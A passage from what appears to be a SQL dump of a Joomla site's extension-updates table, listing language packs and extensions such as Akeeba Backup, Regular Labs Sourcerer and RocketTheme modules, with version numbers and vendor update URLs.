Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(17146,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(17147,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(17148,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(17149,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(17150,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(17151,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(17152,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(17153,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(17154,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(17155,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(17156,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.6.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-1.html',''),(17158,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(17159,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(17160,57,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(17161,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(17162,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(17163,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(17164,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(17165,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(17166,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(17167,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(17168,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(17169,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(17170,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(17171,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(17172,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(17173,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(17174,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(17175,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(17176,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(17177,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(17178,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(17179,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(17180,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(17181,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(17182,57,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(17183,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(17184,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(17185,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(17186,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(17187,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(17188,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(17189,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(17190,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(17191,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(17192,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(17193,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(17194,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(17195,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(17196,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(17197,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(17198,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(17199,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(17200,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(17201,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(17202,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(17203,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(17204,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(17205,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(17206,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(17207,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(17208,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(17209,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.6.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-1.html',''),(17210,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(17211,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(17212,57,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(17213,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(17214,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(17215,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(17216,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(17217,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(17218,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(17219,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(17220,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(17221,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(17222,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(17223,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(17224,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(17225,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(17226,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(17227,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(17228,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(17229,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(17230,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(17231,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(17232,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(17233,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(17234,57,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(17235,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(17236,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(17237,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(17238,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(17239,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(17240,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(17241,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(17242,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(17243,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(17244,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(17245,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(17246,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(17247,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(17248,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(17249,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(17250,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(17251,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(17252,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(17253,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(17254,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(17255,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(17256,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(17257,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(17258,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(17259,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(17260,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(17261,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.6.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-1.html',''),(17262,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17263,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17264,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17265,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17266,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(17267,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(17268,3,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(17269,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(17270,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(17271,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(17272,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(17273,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(17274,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(17275,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(17276,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(17277,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(17278,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(17279,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(17280,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(17281,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(17282,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(17283,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(17284,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(17285,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(17286,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(17287,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(17288,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(17289,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(17290,3,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(17291,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(17292,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(17293,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(17294,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(17295,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(17296,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(17297,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(17298,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(17299,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(17300,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(17301,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(17302,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(17303,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(17304,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(17305,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(17306,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(17307,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(17308,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(17309,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(17310,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(17311,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(17312,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(17313,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(17314,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(17315,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17316,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(17317,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(17318,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(17319,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(17320,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(17321,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(17322,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(17323,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(17324,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(17325,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(17326,57,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(17327,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(17328,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(17329,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(17330,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(17331,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(17332,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(17333,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(17334,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(17335,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(17336,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(17337,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(17338,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(17339,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(17340,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(17341,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(17342,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(17343,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(17344,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(17345,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(17346,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(17347,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(17348,57,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(17349,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(17350,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(17351,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(17352,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(17353,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(17354,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(17355,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(17356,57,0,'Serbian 